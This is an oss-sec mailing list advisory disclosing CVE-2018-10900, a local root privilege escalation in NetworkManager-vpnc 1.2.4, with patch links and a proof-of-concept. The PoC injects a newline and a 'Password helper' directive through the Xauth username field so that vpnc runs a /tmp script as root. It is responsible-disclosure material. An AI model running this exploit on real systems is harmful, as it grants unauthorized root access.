oss-sec mailing list archives
CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation
From: Lubomir Rintel <lkundrak () v3 sk>
Date: Fri, 20 Jul 2018 11:38:39 +0200
Hi, NetworkManager-vpnc-1.2.6 fixes a local authenticated root bug. The bug was responsibly disclosed to us by Denis Andzakovic. Please credit him if you issue an advisory for a product that ships the affected code. His original advisory should be available soon at https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc CVE Number: CVE-2018-10900 Original Report (will be available soon): https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc Patch: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4 Release Notes: https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.news Patched Version: https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.tar.xz The exploit code for QA and documentation purposes follows: cat <<EOF >/tmp/helper #!/bin/bash id >/tmp/pwned EOF chmod +x /tmp/helper nmcli c add con-name poc type vpn ifname '*' vpn-type vpnc \ +vpn.data "IKE DH Group = dh2" \ +vpn.data "IPSec ID = bar" \ +vpn.data "IPSec gateway = 127.0.0.1" \ +vpn.data "IPSec secret-flags = 4" \ +vpn.data "Local Port = 0" \ +vpn.data "NAT Traversal Mode = natt" \ +vpn.data "Perfect Forward Secrecy = server" \ +vpn.data "Vendor = cisco" \ +vpn.data "Xauth password-flags = 4" \ +vpn.data "Xauth username = foo$(echo; echo Password helper /tmp/helper)" \ +vpn.data "ipsec-secret-type = save" \ +vpn.data "xauth-password-type = save" nmcli c up poc $ cat /tmp/pwned uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:vpnc_t:s0 Take care, Lubo
Current thread:
- CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation Lubomir Rintel (Jul 20)